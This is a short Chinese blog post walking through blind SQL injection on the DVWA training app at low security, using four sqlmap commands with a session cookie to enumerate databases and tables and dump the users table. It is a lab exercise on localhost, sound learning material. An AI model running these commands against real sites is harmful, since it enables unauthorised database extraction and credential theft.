DVWA-LOW-SQL Injection(blink)

返回信息只有存在和不存在


反正就是盲注了。这里使用sqlmap进行注入测试。

1.获取数据库名
DVWA页面是有登录凭证的,sqlmap测试链接也应该带上。

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch --dbs
跑完后拿到了所有的数据库名

2.获取当前数据库
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch --current-db

3.获取当前数据库下所有表名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch -D dvwa --tables

很明显目标在users表中

4.获取users表所有数据
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch -D dvwa -T users --dump

end

后记:cookie存储登录等凭证有风险,敏感信息加密算法不能太简单。

posted @ 2020-09-29 11:04  李沐子  阅读(125)  评论(0)    收藏  举报